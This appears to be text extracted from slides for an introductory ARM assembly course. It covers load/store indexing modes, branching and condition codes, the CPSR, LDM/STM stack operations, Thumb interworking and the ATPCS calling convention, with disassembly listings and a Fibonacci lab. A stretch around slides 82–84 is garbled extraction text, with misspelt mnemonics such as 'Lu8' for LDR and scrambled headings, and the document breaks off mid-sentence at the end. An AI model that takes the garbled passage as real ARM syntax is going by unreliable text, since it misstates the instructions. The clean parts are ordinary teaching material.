Means R2 = R0 & ~(R1) = 0b0101 0011 or 0x53
Mask can also be a shifted value (using Shift operations)
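The BIC example translates directly into a single C expression. The function name `bic` is used here only to mirror the mnemonic.

```c
#include <stdint.h>

/* BIC: clear in rn every bit that is set in mask. */
uint32_t bic(uint32_t rn, uint32_t mask)
{
    return rn & ~mask;
}
```

`bic(0x57, 0x24)` returns 0x53 as worked out above, and a shifted mask such as `bic(x, 1u << 3)` clears a single bit.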
Memory operations Part I
LDR - Load data from memory into registers
STR - Store data from registers to memory
Caveat: LDR/STR can load/store data on a boundary alignment that is the same as the data type size being loaded/stored.
  LDR can only load 32-bit words on a memory address that is a multiple of 4 bytes.
Memory Operations Part I contd.
LDR r0, [r1] loads r0 with contents of memory address pointed to by r1
STR r0, [r1] stores the contents of r0 to the memory address pointed to by r1.
  Warning: This can be confusing since destination is actually specified in the second argument
Also LDR r0, [r1, #4] means
  r0 = [r1 + 4] and r1 value remains unchanged
Similarly STR r0, [r1, #4] means
  [r1+4] = r0 and r1 value remains unchanged
The addressing mode of the above two instructions is called pre-indexed addressing
Example 8.c
0000838c <main>:
838c: b580 push {r7, lr}
838e: b084 sub sp, #16
8390: af00 add r7, sp, #0
8392: f04f 0308 mov.w r3, #8
8396: 607b str r3, [r7, #4]
8398: f04f 0309 mov.w r3, #9
839c: 60fb str r3, [r7, #12]
839e: f107 0304 add.w r3, r7, #4
83a2: 60bb str r3, [r7, #8]
83a4: 68bb ldr r3, [r7, #8]
83a6: 681b ldr r3, [r3, #0]
83a8: f103 0302 add.w r3, r3, #2
83ac: 60fb str r3, [r7, #12]
83ae: f248 4330 movw r3, #33840 ; 0x8430
83b2: f2c0 0300 movt r3, #0
83b6: 4618 mov r0, r3
83b8: 68b9 ldr r1, [r7, #8]
83ba: f7ff ef92 blx 82e0 <_init+0x20>
83be: f248 434c movw r3, #33868 ; 0x844c
83c2: f2c0 0300 movt r3, #0
83c6: 4618 mov r0, r3
83c8: 68f9 ldr r1, [r7, #12]
83ca: f7ff ef8a blx 82e0 <_init+0x20>
83ce: f04f 0300 mov.w r3, #0
83d2: 4618 mov r0, r3
83d4: f107 0710 add.w r7, r7, #16
83d8: 46bd mov sp, r7
83da: bd80 pop {r7, pc}
int main(void)
{
int a, b;
int *x;
a = 8;
b = 9;

x = &a;
b = *x + 2;
printf("The address of a is 0x%x\n",x);
printf("The value of b is now %d\n",b);
return 0;
}
Memory operations Part I contd.
R7 in the previous example is known as base address register, where the base address register can be any one of R0-R12, SP, or LR
We will cover consecutive multiple loads in one instruction later
Control Flow operations (Table A4-1)
Instruction | Description | Thumb mode range | ARM mode range
B <label> | Branch to target address | +/- 16 MB | +/- 32 MB
BL, BLX <imm> | Call a subroutine; call a subroutine, change instruction set | +/- 16 MB | +/- 32 MB
BLX <reg> | Call a subroutine, optionally change instruction set | Any | Any
BX | Branch to target address, change instruction set | Any | Any
CBZ | Compare and Branch on Zero | 0-126 bytes | Does not exist
CBNZ | Compare and Branch on Nonzero | 0-126 bytes | Does not exist
TBB | Table Branch (byte offsets) | 0-510 bytes | Does not exist
TBH | Table Branch (halfword offsets) | 0-131070 bytes | Does not exist
Conditional Branching
BLE: Branch if less than or equal
  Z=1 OR N!=V
BGT: Branch if greater than
  Z=0 AND N=V
BEQ: Branch if equal
  Z=1
BNE: Branch if not equal
  Z=0
How do N and V flags tell us if something is less or greater than?
  Generally there is a CMP or TST instruction before
  CMP <r0> <r1> means perform <r0> - <r1>
Example 9.s
0000835c <__libc_csu_init>:
835c: e92d 43f8 stmdb sp!, {r3, r4, r5, r6, r7, r8, r9, lr}
8360: 4606 mov r6, r0
8362: f8df 9034 ldr.w r9, [pc, #52] ; 8398 <__libc_csu_init+0x3c>
8366: 460f mov r7, r1
8368: 4d0c ldr r5, [pc, #48] ; (839c <__libc_csu_init+0x40>)
836a: 4690 mov r8, r2
836c: 44f9 add r9, pc
836e: f7ff ff91 bl 8294 <_init>
8372: 447d add r5, pc
8374: ebc5 0909 rsb r9, r5, r9
8378: ea5f 09a9 movs.w r9, r9, asr #2
837c: d009 beq.n 8392 <__libc_csu_init+0x36>
837e: 2400 movs r4, #0
8380: f855 3b04 ldr.w r3, [r5], #4
8384: 4630 mov r0, r6
8386: 4639 mov r1, r7
8388: 4642 mov r2, r8
838a: 3401 adds r4, #1
838c: 4798 blx r3
838e: 454c cmp r4, r9
8390: d1f6 bne.n 8380 <__libc_csu_init+0x24>
8392: e8bd 83f8 ldmia.w sp!, {r3, r4, r5, r6, r7, r8, r9, pc}
8396: bf00 nop
8398: 00008ba0 .word 0x00008ba0
839c: 00008b96 .word 0x00008b96
Current Program Status Register
Bit:    31  30  29  28  27  26-10         9  8  7  6  5  4-0
Field:  N   Z   C   V   Q   (unlabeled)   E  A  I  F  T  MODE
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
Hello, World in ARM Assembly
.text
_start: .global _start

@ sys_write ( fd, pstr, len )
@ r7=4 r0 r1 r2
mov r0, #1 @ fd <- stdout
adr r1, msg @ pstr <- *msg
mov r2, #14 @ len <- 14
mov r7, #4 @ syscall <- sys_write
swi 0 @ system call
@ sys_exit ( exitcode )
@ r7=1 r0
mov r0, #0 @ exitcode <- 0
mov r7, #1 @ syscall <- sys_exit
swi 0 @ system call
msg:
.asciz "Hello, world!\n"
.end
Linux GNUEABI spec means syscall identifier is put in R7 and arguments in R0-R6

Linux kernel ignores #imm value after SWI instruction

Syscall invoked with SWI/SVC instruction (supervisor mode)
Source: http://peterdn.com/post/e28098Hello-Worlde28099-in-ARM-assembly.aspx
Instructions covered so far...
NOP
ADD, ADC, SUB, SBC, RSB, RSC
ASR, LSL, LSR, ROR, RRX
MOV, MVN
REV, REVSH, REV16
AND, EOR, ORR, ORN, CMP, CMN
BIC, TEQ, TST
B, BL, BLX, BLE, BGT
SWI
Hints on how to RTFM
{S} - updates flags in the CPSR
<c> - allows mnemonic of conditional to be added
<q> - instruction suffix with either:
  .N Narrow, assembler must use 16-bit encoding for the instruction
  .W Wide, assembler must use 32-bit encoding for the instruction
Do not use the .N or .W in your assembly code. As per manual, it will throw errors. Assembler decides on encoding depending on options selected.
Lab 1
Again commands given below for copying files into and out of the simulator
scp -P 2200 <localfile> root@localhost:/path/to/file
scp -P 2200 root@localhost:/path/to/file <localfile>
Password is passw0rd
Fibonacci program
Write assembly function to calculate fibonacci value at a given position x
R0 has x
For example: [0, 1, 2, 3, 4, 5, 6 ...] x
[0, 1, 1, 2, 3, 5, 8 ...] fibonacci(x)
Only modify fib.s
Sample algorithms
// Non-recursive
int fibonacci(int x) {
int previous = -1;
int result = 1;
int i=0;
int sum=0;
for (i = 0; i <= x; i++) {
sum = result + previous;
previous = result;
result = sum;
}
return result;
}
// Recursive
int fibonacci(int x) {
if(x<=0) return 0;
if(x==1) return 1;
return fibonacci(x-1) + fibonacci(x-2);
}
NOTE: Filler code follows Recursive algorithm.
Possible solution
fibonacci:
    push {r3, r4, r5, lr}       @ function prolog
    subs r4, r0, #0             @ r4 = r0 - 0
    ble .L3                     @ if (r0 <= 0) goto .L3

    cmp r4, #1                  @ Compare r4 to 1
    beq .L4                     @ if (r4 == 1) goto .L4

    add r0, r4, #4294967295     @ r0 = r4 + 4294967295 (0xFFFFFFFF), i.e. r4 - 1
    bl fibonacci                @ call fibonacci (PC relative address)

    mov r5, r0                  @ r5 = r0
    sub r0, r4, #2              @ r0 = r4 - 2
    bl fibonacci                @ call fibonacci (PC relative address)

adds r0, r5, r0
pop {r3, r4, r5, pc}
.L3:
mov r0, #0
pop {r3, r4, r5, pc}
.L4:
mov r0, #1
pop {r3, r4, r5, pc}

!"# % &"'( C
82
Ah Lhe old [oke.
Source: hup://xkcd.com/138/
83
Memory operauons arL l remlnder.
Lu8 r0, [r1]
81 ln Lhls example ls known as :19. 1<<).99
).?,9-.), where Lhe base address reglsLer can
be any one of 80-812, S, or L8
84
Memory Operations Part II: Indexing operations
Preindex with Writeback (denoted by [Rn,offset]!)
  Calculates address in base register + offset
  Uses calculated address for operation into Rt
  Stores the calculated address into base register
Preindex (denoted by [Rn,offset])
  Calculates address in base register + offset
  Uses calculated address for operation into Rt
  Does NOT store the calculated address into base register
Postindex (denoted by [Rn],offset)
  Uses address in base register for operation into Rt
  Calculates address in base register + offset
  Stores the calculated address into base register
Lu8 lndexlng
J5<.6,5? 27<. J59-)/*>75 'F '% 7) ':19.
relndex wlLh
WrlLeback
Lu8 r0, Lr1, 2MN r0 = [r1 + 2] r1 = r1 + 2
Lu8 r0, Lr1, r2MN r0 = [r1 + r2] r1 = r1 + r2
Lu8 r0, Lr1, r2, LSL 3MN r0 = [r1 + (r2 LSL 3)] r1 = r1 + (r2 LSL 3)
relndex Lu8 r0, Lr1, 2M r0 = [r1 + 2] r1 = r1
Lu8 r0, Lr1, r2M r0 = [r1 + r2] r1 = r1
Lu8 r0, Lr1, r2, LSL 3M r0 = [r1 + (r2 LSL 3)] r1 = r1
osundex Lu8 r0, Lr1M, 2 r0 = [r1] r1 = r1 + 2
Lu8 r0, Lr1M, r2 r0 = [r1] r1 = r1 + r2
Lu8 r0, Lr1M, r2, LSL 3 r0 = [r1] r1 = r1 + (r2 LSL 3)
lnsLrucuon form: Lu8<c> <8L>, [<8n>, oseL] where [] denoLes memory conLenLs of
Source: hup://www.slldeshare.neL/guesL36d1b781/arm-fundamenLals
STR indexing
Indexing mode            Instruction                 Rt                        Rn or Rbase
Preindex with Writeback  STR r0, [r1, #2]!           [r1 + 2] = r0             r1 = r1 + 2
                         STR r0, [r1, r2]!           [r1 + r2] = r0            r1 = r1 + r2
                         STR r0, [r1, r2, LSL #3]!   [r1 + (r2 LSL 3)] = r0    r1 = r1 + (r2 LSL 3)
Preindex                 STR r0, [r1, #2]            [r1 + 2] = r0             r1 = r1
                         STR r0, [r1, r2]            [r1 + r2] = r0            r1 = r1
                         STR r0, [r1, r2, LSL #3]    [r1 + (r2 LSL 3)] = r0    r1 = r1
Postindex                STR r0, [r1], #2            [r1] = r0                 r1 = r1 + 2
                         STR r0, [r1], r2            [r1] = r0                 r1 = r1 + r2
                         STR r0, [r1], r2, LSL #3    [r1] = r0                 r1 = r1 + (r2 LSL 3)
Instruction form: STR<c> <Rt>, [<Rn>, offset] where [] denotes memory contents of
Source: http://www.slideshare.net/guest36d1b781/arm-fundamentals
Example 10 (Any program)
00008318 <main>:
8318: b508 push {r3, lr}
831a: 2001 movs r0, #1
831c: f248 4108 movw r1, #33800 ; 0x8408
8320: f247 6201 movw r2, #30209 ; 0x7601
8324: f2c0 0100 movt r1, #0
8328: f2c2 7297 movt r2, #10135 ; 0x2797
832c: f7ff efe8 blx 8300 <_init+0x3c>
8330: 2000 movs r0, #0
8332: bd08 pop {r3, pc}

00008334 <_start>:
8334: f04f 0b00 mov.w fp, #0
8338: f04f 0e00 mov.w lr, #0
833c: f85d 1b04 ldr.w r1, [sp], #4
8340: 466a mov r2, sp
8342: f84d 2d04 str.w r2, [sp, #-4]!
8346: f84d 0d04 str.w r0, [sp, #-4]!
834a: f8df c014 ldr.w ip, [pc, #20] ;
8360 <_start+0x2c>
834e: f84d cd04 str.w ip, [sp, #-4]!
8352: 4804 ldr r0, [pc, #16] ;
(8364 <_start+0x30>)
8354: 4b04 ldr r3, [pc, #16] ;
(8368 <_start+0x34>)
8356: f7ff efc6 blx 82e4 <_init+0x20>
835a: f7ff efd8 blx 830c <_init+0x48>
835e: 0000 .short 0x0000
8360: 000083f9 .word 0x000083f9
8364: 00008319 .word 0x00008319
8368: 000083b5 .word 0x000083b5


A note on LDR/STR
For loading large constants into registers, the assembler generally prefers using MVN <Rd>, <~large constant> (~ is Bitwise NOT)
Assembler likes to use values between 0 and 255 along with barrel shifts to arrive at value
Example:
Instead of:
LDR R0, =0xffffff23
MVN R0, #0xDC
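Why 0xffffff23 needs the bitwise-NOT form can be checked with a small C sketch. It assumes the classic ARM-state immediate form (an 8-bit value rotated right by an even amount); the function names are made up for this illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Rotate a 32-bit value left by n bits (n in 0..31). */
static uint32_t rotl32(uint32_t v, unsigned n)
{
    return n == 0 ? v : (v << n) | (v >> (32 - n));
}

/* True if v is an 8-bit value rotated right by an even amount,
   i.e. it fits the ARM-state data-processing immediate form. */
static bool arm_imm_encodable(uint32_t v)
{
    for (unsigned rot = 0; rot < 32; rot += 2) {
        /* Undo a rotate-right by `rot`; an 8-bit result means v is encodable. */
        if (rotl32(v, rot) <= 0xFFu)
            return true;
    }
    return false;
}

/* True if the bitwise NOT of v is encodable, so MVN can produce v. */
static bool arm_mvn_encodable(uint32_t v)
{
    return arm_imm_encodable(~v);
}
```

With these helpers, 0xffffff23 is not directly encodable, but its complement 0xDC is, which is the case shown in the example above.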

Other Instructions
SSAT <reg1> <imm> <reg2> - Signed Saturate
USAT <reg1> <imm> <reg2> - Unsigned Saturate
QADD <reg1> <reg2> <reg3> - Add & saturate the result (<reg1> = sat(<reg2> + <reg3>))
QSUB - Subtract & saturate the result <reg1> = sat(<reg2> - <reg3>)
QDADD - Saturate Double & Add <reg1> = sat(<reg2> + 2*<reg3>)
QDSUB - <reg1> = sat(<reg2> - 2*<reg3>)
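A minimal C model of the signed saturating operations listed above, as a sketch only. The helper names are assumptions for this example, and the doubling in `qdadd` is saturated before the add, which is how the architecture defines QDADD.

```c
#include <stdint.h>

/* Clamp a 64-bit intermediate result into the signed 32-bit range. */
static int32_t sat32(int64_t v)
{
    if (v > INT32_MAX) return INT32_MAX;
    if (v < INT32_MIN) return INT32_MIN;
    return (int32_t)v;
}

/* QADD: sat(a + b) */
static int32_t qadd(int32_t a, int32_t b)
{
    return sat32((int64_t)a + b);
}

/* QSUB: sat(a - b) */
static int32_t qsub(int32_t a, int32_t b)
{
    return sat32((int64_t)a - b);
}

/* QDADD: sat(a + sat(2*b)); the doubling saturates on its own first. */
static int32_t qdadd(int32_t a, int32_t b)
{
    return sat32((int64_t)a + sat32(2 * (int64_t)b));
}
```

Doing the arithmetic in 64 bits avoids signed overflow in C itself, so the clamp is the only place where the range is enforced.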
Control Flow operations (Table A4-1)
Instruction     Description                                                          Thumb mode range   ARM mode range
B <label>       Branch to target address                                             +/- 16 MB          +/- 32 MB
BL, BLX <imm>   Call a subroutine; Call a subroutine, change instruction set         +/- 16 MB          +/- 32 MB
BLX <reg>       Call a subroutine, optionally change instruction set                 Any                Any
BX              Branch to target address, change instruction set                     Any                Any
CBZ             Compare and Branch on Zero (16-bit)                                  +4 to +130 bytes   Does not exist
                Permitted offsets are even from 0 - 126
CBNZ            Compare and Branch on Nonzero (16-bit)                               +4 to +130 bytes   Does not exist
                Permitted offsets are even from 0 - 126
TBB             Table Branch (byte offsets) (32-bit)                                 0-510 bytes        Does not exist
TBH             Table Branch (halfword offsets) (32-bit)                             0-131070 bytes     Does not exist
Conditional execution
Most instructions can be made conditional by adding two letter mnemonic from table A8-1 to end of an existing instruction
It increases performance by reducing the number of branches
Example:
ADDEQ r0, r1, r2 ; If zero flag is set then r0=r1+r2
Conditional operations (Table A8-1)
Suffix   Description               Flags tested
EQ       Equal                     Z=1
NE       Not Equal                 Z=0
CS/HS    Unsigned higher or same   C=1
CC/LO    Unsigned lower            C=0
MI       Minus                     N=1
PL       Positive or Zero          N=0
VS       Overflow                  V=1
VC       No overflow               V=0
HI       Unsigned Higher           C=1 AND Z=0
LS       Unsigned lower or same    C=0 OR Z=1
GE       Greater or equal          N=V
LT       Less than                 N!=V
GT       Greater than              Z=0 AND N=V
LE       Less than or equal        Z=1 OR N!=V
AL       Always
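The condition table can be written as a small C predicate, which may help when stepping through conditional instructions by hand. The type and function names here are hypothetical, chosen only for this sketch.

```c
#include <stdbool.h>

/* The four condition flags of the status register. */
typedef struct { bool n, z, c, v; } flags_t;

typedef enum {
    COND_EQ, COND_NE, COND_CS, COND_CC, COND_MI, COND_PL, COND_VS, COND_VC,
    COND_HI, COND_LS, COND_GE, COND_LT, COND_GT, COND_LE, COND_AL
} cond_t;

/* Returns true when an instruction with this suffix would execute. */
static bool cond_passes(cond_t cond, flags_t f)
{
    switch (cond) {
    case COND_EQ: return f.z;
    case COND_NE: return !f.z;
    case COND_CS: return f.c;                 /* also written HS */
    case COND_CC: return !f.c;                /* also written LO */
    case COND_MI: return f.n;
    case COND_PL: return !f.n;
    case COND_VS: return f.v;
    case COND_VC: return !f.v;
    case COND_HI: return f.c && !f.z;
    case COND_LS: return !f.c || f.z;
    case COND_GE: return f.n == f.v;
    case COND_LT: return f.n != f.v;
    case COND_GT: return !f.z && f.n == f.v;
    case COND_LE: return f.z || f.n != f.v;
    case COND_AL: return true;
    }
    return false;
}
```

For example, after comparing 1 with 2 the flags are N=1, Z=0, C=0, V=0, so LT and CC/LO pass while GE and HI do not.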
Current Program Status Register
Bit layout: 31 N | 30 Z | 29 C | 28 V | 27 Q | 26-10 (unlabelled) | 9 E | 8 A | 7 I | 6 F | 5 T | 4-0 _MODE
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
Pipelining
Does not decrease instruction execution time
Increases throughput
Time allocated dependent on longest cycle instruction
Fetches and decodes instructions in parallel while executing current instruction.
Source:
http://www-cs-faculty.stanford.edu/~eroberts/courses/soco/projects/2000-01/risc/pipelining/index.html

Also see http://www.cse.unsw.edu.au/~cs9244/06/seminars/08-leonidr.pdf
Pipelining in action
Source: http://web.eecs.umich.edu/~prabal/teaching/eecs373-f10/readings/ARMArchitectureOverview.pdf

Issues associated with pipelining
Branch instructions
  Conditional execution reduces number of branches, which reduces number of pipeline flushes
Instructions dependent on previous instructions (data-dependency)
Interrupts in the beginning/middle/end of cycle?
How code is optimized for pipelining is compiler & processor dependent
Source: http://bnrg.eecs.berkeley.edu/~randy/Courses/CS232.S96/Lecture08.pdf
Other ways of branching
LDR PC, [PC, #offset]
Value written has to be aligned for mode
Earlier processors (armv4 and earlier) used to have prefetch
  PC points two instructions ahead
  Programmer has to account for PC+8
  Store address of branch location at current address + offset + 8
Same tradition continues for all arm architectures so far
Source: http://en.wikipedia.org/wiki/List_of_ARM_microprocessor_cores
Example 12.s
0x10000000 add r0, r1, r2
0x10000004 ldr pc, [pc, #4]
0x10000008 sub r1, r2, r3
0x1000000c cmp r0, r1
0x10000010 0x20000000
...
Branch target
0x20000000 str r5, [r13, #-4]!
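The PC+8 rule used by this example can be checked with a one-line C helper. This is a sketch for ARM state only, and the function name is an assumption for illustration.

```c
#include <stdint.h>

/* Address accessed by an ARM-state [pc, #offset] operand:
   in ARM state the PC reads as the instruction's own address plus 8. */
static uint32_t arm_pc_relative_address(uint32_t insn_addr, int32_t offset)
{
    return insn_addr + 8u + (uint32_t)offset;
}
```

For the `ldr pc, [pc, #4]` at 0x10000004 this gives 0x10000010, the word that holds the branch target 0x20000000.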
One instruction to rule them all...
LDM/STM - Load multiple/Store multiple
Used in conjunction with a suffix (called mode) for how to move consecutively
Lowest register uses the lowest memory address
LDM/STM modes
Mode  Short description   LDM synonym  STM synonym  Start Address  End Address  Rn!
IA    Increment After     P=0, U=1     P=0, U=1     Rn             Rn+4N-4      Rn+4N
IB    Increment Before    P=1, U=1     P=1, U=1     Rn+4           Rn+4N        Rn+4N
DA    Decrement After     P=0, U=0     P=0, U=0     Rn-4N+4        Rn           Rn-4N
DB    Decrement Before    P=1, U=0     P=1, U=0     Rn-4N          Rn-4         Rn-4N
FA    Full Ascending      DA           IB
EA    Empty Ascending     DB           IA
FD    Full Descending     IA           DB
ED    Empty Descending    IB           DA
N is the number of registers
n goes from 1..N
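The start address, end address and written-back Rn for the four basic modes can be computed with a short C sketch. The enum, struct and function names are hypothetical, and `count` stands for N, the number of registers in the list.

```c
#include <stdint.h>

typedef enum { MODE_IA, MODE_IB, MODE_DA, MODE_DB } ldm_mode;

typedef struct {
    uint32_t start;   /* address used for the lowest-numbered register */
    uint32_t end;     /* address used for the highest-numbered register */
    uint32_t rn_wb;   /* value written back to Rn when "!" is present */
} ldm_range;

/* Address range touched by LDM/STM for a base value rn and `count` registers. */
static ldm_range ldm_addresses(ldm_mode mode, uint32_t rn, uint32_t count)
{
    uint32_t bytes = 4u * count;
    ldm_range r = {0, 0, 0};

    switch (mode) {
    case MODE_IA: r.start = rn;             r.end = rn + bytes - 4; r.rn_wb = rn + bytes; break;
    case MODE_IB: r.start = rn + 4;         r.end = rn + bytes;     r.rn_wb = rn + bytes; break;
    case MODE_DA: r.start = rn - bytes + 4; r.end = rn;             r.rn_wb = rn - bytes; break;
    case MODE_DB: r.start = rn - bytes;     r.end = rn - 4;         r.rn_wb = rn - bytes; break;
    }
    return r;
}
```

As a usage example, a decrement-before store of four registers from a base of 0x8018 covers 0x8008 to 0x8014 and leaves the base at 0x8008.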
Stack operations
Instead of POP, we use Load-Multiple
Instead of PUSH, we use Store-Multiple
Stacks can be
  (A)scending - stack grows to higher memory addresses
  (D)escending - stack grows to lower memory addresses
LDM/STM pairs
Store Multiple   Load Multiple
STMIA            LDMDB
STMIB            LDMDA
STMDA            LDMIB
STMDB            LDMIA
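STMDB operation
INSTRUCTION: STMDB sp!, {r3, r4, r5, r7}
Registers: R3 = 0xFEED0000, R4 = 0x0000CAFE, R5 = 0xABCDDEFF, R7 = 0xF00D0000
SP before: 0x00008018, SP after: 0x00008008
Memory shown: 0x8000 to 0x8018 in 4-byte steps
Stored values (lowest register at the lowest address):
0x8008 0xFEED0000 (R3)
0x800C 0x0000CAFE (R4)
0x8010 0xABCDDEFF (R5)
0x8014 0xF00D0000 (R7)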
LDMIA operation
INSTRUCTION: LDMIA sp!, {r3, r4, r5, r7}
SP before: 0x00008008, SP after: 0x00008018
Memory shown: 0x8000 to 0x8018 in 4-byte steps
Loaded values (lowest register from the lowest address):
0x8008 0xFEED0000 -> R3
0x800C 0x0000CAFE -> R4
0x8010 0xABCDDEFF -> R5
0x8014 0xF00D0000 -> R7
Example 13.s
0000835c <__libc_csu_init>:
835c: e92d 43f8 stmdb sp!, {r3, r4, r5, r6, r7, r8, r9, lr}
8360: 4606 mov r6, r0
8362: f8df 9034 ldr.w r9, [pc, #52] ; 8398 <__libc_csu_init+0x3c>
8366: 460f mov r7, r1
8368: 4d0c ldr r5, [pc, #48] ; (839c <__libc_csu_init+0x40>)
836a: 4690 mov r8, r2
836c: 44f9 add r9, pc
836e: f7ff ff91 bl 8294 <_init>
8372: 447d add r5, pc
8374: ebc5 0909 rsb r9, r5, r9
8378: ea5f 09a9 movs.w r9, r9, asr #2
837c: d009 beq.n 8392 <__libc_csu_init+0x36>
837e: 2400 movs r4, #0
8380: f855 3b04 ldr.w r3, [r5], #4
8384: 4630 mov r0, r6
8386: 4639 mov r1, r7
8388: 4642 mov r2, r8
838a: 3401 adds r4, #1
838c: 4798 blx r3
838e: 454c cmp r4, r9
8390: d1f6 bne.n 8380 <__libc_csu_init+0x24>
8392: e8bd 83f8 ldmia.w sp!, {r3, r4, r5, r6, r7, r8, r9, pc}
8396: bf00 nop
8398: 00008ba0 .word 0x00008ba0
839c: 00008b96 .word 0x00008b96
Switching between ARM and Thumb states
A processor in Thumb can enter ARM state by executing any of the following:
  BX, BLX, or LDR/LDM operation on PC (R15)
A processor in ARM can enter Thumb state by executing any of the following:
  ADC, ADD, AND, ASR, BIC, EOR, LSL, LSR, MOV, MVN, ORR, ROR, RRX, RSB, RSC, SBC, or SUB operation on PC (R15) and which does not set the condition flags.
Thumb2 instruction set means ...
The instructions in Thumb2 itself are a mix of 16-bit and 32-bit instructions and are run in Thumb-mode
Compiler option to mix ARM-mode and Thumb-mode instructions: -mthumb-interwork
Default is -mno-thumb-interwork
The Xeno Question - So how can we tell the difference?
Mentioned in the ATPCS manual (included in the references)
The LSB (rightmost bit) of branch address has to be 1 if the instructions at that address are to be interpreted as Thumb2
If you want to jump to address containing a mix of 16-bit and 32-bit instructions make sure the address is odd.
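The odd-address rule can be expressed as two small C helpers, shown here as a sketch with made-up function names. It models how an interworking branch splits a register value into a state bit and an instruction address.

```c
#include <stdint.h>

/* Instruction address actually branched to: the low bit is cleared. */
static uint32_t branch_target_address(uint32_t rm)
{
    return rm & 0xFFFFFFFEu;
}

/* 1 if the target is to be executed in Thumb state, 0 for ARM state. */
static int branch_target_is_thumb(uint32_t rm)
{
    return (int)(rm & 1u);
}
```

In the Example 10 listing, the literal `.word 0x00008319` follows this pattern: it refers to `main` at 0x8318 with the low bit set to select Thumb state.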
How does Thumb mode differentiate b/w 16-bit and 32-bit instructions?
In Thumb mode ARM processor only reads halfword-aligned halfwords
Looks at instruction encoding:
  If bits 15:11 of the halfword being decoded is one of following, then it is the first halfword of a 32 bit instruction
    0b11101
    0b11110
    0b11111
  Otherwise, it is interpreted as 16-bit instruction
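The decoding rule above fits in a few lines of C. This is only a sketch of the check; the function name is an assumption for this example.

```c
#include <stdbool.h>
#include <stdint.h>

/* True if this halfword is the first half of a 32-bit Thumb instruction. */
static bool thumb_is_32bit_first_halfword(uint16_t hw)
{
    unsigned top5 = hw >> 11;   /* bits 15:11 */
    return top5 == 0x1D || top5 == 0x1E || top5 == 0x1F;
}
```

Trying it on halfwords from the earlier listings: 0xb508 (`push`) and 0x2001 (`movs`) are 16-bit, while 0xf248 (`movw`) and 0xe92d (`stmdb`) start 32-bit instructions.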
ARM-Thumb Procedure Call Standard
Followed by compilers
Caller saved registers:
  The caller subroutine must preserve the contents of R0 - R3 if it needs them before calling another subroutine
Callee saved registers:
  The called subroutine must preserve the contents of R4 - R11 (usually on the stack in memory) and must restore the values before returning (if used).
What about interrupts?
ATPCS
Register  Synonym/Special  Role in the procedure call standard
r15       PC               The Program Counter. (x86 EIP)
r14       LR               The Link Register. (x86 saved EIP)
r13       SP               The Stack Pointer. (x86 ESP)
r12       IP               The Intra-Procedure-call scratch register. (x86 RSI)
r11       v8               Variable-register 8/Frame Pointer (x86 EBP)
r10       v7               Variable-register 7/Stack Limit
r9        v6/SB/TR         Platform specific register.
r8        v5               Variable-register 5.
r7        v4               Variable-register 4. (can also be x86 EBP)
r6        v3               Variable-register 3.
r5        v2               Variable-register 2.
r4        v1               Variable-register 1.
r3        a4               Argument/scratch register 4.
r2        a3               Argument/scratch register 3.
r1        a2               Argument/result/scratch register 2.
r0        a1               Argument/result/scratch register 1.
ATPCS
r0 - r3: Caller saved
r4 - r9, r10 (SL), r11 (FP): Callee saved
r12 (IP), r13 (SP), r14 (LR), r15 (PC), CPSR
Stack Pointer should be same upon Callee return as it was upon Callee entry. So should the Link Register
FP is neither mandated nor precluded from use. If it is used, it must be Callee saved. In ARM state, R11 is used. In Thumb state, R4-R7 can be used.
ATPCS in action
int main(void)
{
one();
return 0;
}

void one(void)
{
zero();
two();
return;
}

void two(void)
{
printf("main...one...two\n");
return;
}

void zero(void)
{
return;
}
int main(void)
{
r0-r3 saved.
call to one() made.
}

void one(void)
{
r4-r11 saved.
lr saved
fp saved to point to one above lr in stack
// use r0-r3 as arguments
two();
r4-r11, lr restored
bx lr (branches to lr)
}


So, how does this stack up? (pun intended)
(Stack diagram with an arrow labelled "Increasing Memory")
...
main() frame: Local variables, Caller-save registers, Args to One()
Undefined
Undefined
Branch with Link occurs to one()
(Stack diagram with an arrow labelled "Increasing Memory")
...
main() frame: Local variables, Caller-save registers, Args to One()
Undefined
Undefined
Processor copies PC into LR
Sets PC = one() in memory
ARM now executing first instruction in one()
(Stack diagram with an arrow labelled "Increasing Memory")
...
main() frame: Local variables, Caller-save registers, Args to One()
One() frame: Callee-save registers, LR = PCmain
Undefined
Callee-save registers are pushed onto stack using STMFD sp!, {registers} along with R14 (LR)
And R11/R7/R3 (FP) can also be updated relative to (R13) SP
ARM now executing second instruction in one()
(Stack diagram with an arrow labelled "Increasing Memory")
...
main() frame: Local variables, Caller-save registers, Args to One()
One() frame: Callee-save registers, LR = PCmain, Local variables
Undefined
Local variables are also added to the stack
PC now about to branch to two()
(Stack diagram with an arrow labelled "Increasing Memory")
...
main() frame: Local variables, Caller-save registers, Args to One()
One() frame: Callee-save registers, LR = PCmain, Local variables, Caller-save registers, Args to Two()
Undefined
Caller-save registers for one() are saved.
Arguments to two are also pushed
Branch with Link occurs to two()
(Stack diagram with an arrow labelled "Increasing Memory")
...
main() frame: Local variables, Caller-save registers, Args to One()
One() frame: Callee-save registers, LR = PCmain, Local variables, Caller-save registers, Args to Two()
Two() frame
Processor copies PC into LR
Sets PC = two() in memory
ARM now executes first instruction in two()
(Stack diagram with an arrow labelled "Increasing Memory")
...
main() frame: Local variables, Caller-save registers, Args to One()
One() frame: Callee-save registers, LR = PCmain(), Local variables, Caller-save registers, Args to Two()
Two() frame: Callee-save registers, LR = PCOne()
Saves the callee-save registers
Also saves the R14 (Link Register)
So, how did it stack up?
Similar to x86 in some ways.
However, R11 (FP) is not really used much.
SP is updated using STMFD and LDMFD
Despite the return address being saved in the LR, most often it is put on the stack and then restored later directly into PC
  Which may help you in Lab 3.
Current Program Status Register
Bit layout: 31 N | 30 Z | 29 C | 28 V | 27 Q | 26-10 (unlabelled) | 9 E | 8 A | 7 I | 6 F | 5 T | 4-0 _MODE
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
_Mode [4:0]   Mode
10000         User
10001         FIQ
10010         IRQ
10011         SVC (Supervisor)
10111         Abort
11011         Undefined
11111         System
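Decoding a CPSR value by hand gets tedious in the debugger, so here is a small C sketch that applies the bit positions and mode encodings from the slide. The function names are assumptions made for this example.

```c
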